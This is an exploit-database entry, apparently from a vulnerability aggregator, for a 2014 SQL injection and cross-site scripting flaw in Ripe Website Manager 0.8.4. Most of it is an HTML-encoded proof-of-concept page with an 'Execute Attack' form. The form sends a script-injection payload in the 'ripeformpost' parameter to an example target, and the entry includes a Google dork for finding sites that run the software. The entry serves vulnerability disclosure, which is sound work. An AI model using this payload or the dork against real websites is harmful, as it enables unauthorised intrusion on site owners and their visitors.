Ripe Website Manager 0.8.4 contact/index.php ripeformpost Parameter SQL Injection

🗓️ 01 Jul 2014 00:00:00Reported by RootType

Ripe Website Manager 0.8.4 contact/index.php ripeformpost Parameter SQL Injection vulnerability discovere


                                                source: http://www.securityfocus.com/bid/23597/info


&#60;html&#62;
&#60;head&#62;&#60;title&#62;Ripe Website Manager (&#60;= 0.8.4) - Cross-Site Scripting and SQL Injection Exploit&#60;/title&#62;&#60;body&#62;

&#60;center&#62;&#60;br&#62;&#60;br&#62;&#60;font size=4&#62;Ripe Website Manager (&#60;= 0.8.4) - Cross-Site Scripting and SQL Injection Exploit&#60;/font&#62;&#60;br&#62;&#60;font size=3&#62;discovered by &#60;a
href=&#34;http://john-martinelli.com&#34;&#62;John Martinelli&#60;/a&#62;&#60;br&#62;&#60;br&#62;Google d0rk: &#60;a href=&#34;http://www.google.com/search?q=%22Powered+by+Ripe+Website+Manager&#62;&#34;Powered by Ripe
Website Manager&#34;&#60;/a&#62;&#60;/font&#62;&#60;br&#62;

&#60;br&#62;&#60;br&#62;
&#60;form action=&#34;http://www.example.com/path/contact/index.php&#34; method=&#34;post&#34;&#62;
&#60;input name=&#34;ripeformpost&#34; size=75 value=&#34;&#60;&#34;&#60;&#60;script&#62;alert(1);&#60;/script&#62;&#34;&#62;
&#60;input type=submit value=&#34;Execute Attack&#34; class=&#34;button&#34;&#62;
&#60;/form&#62;

01 Jul 2014 00:00Current

7.1High risk

Vulners AI Score7.1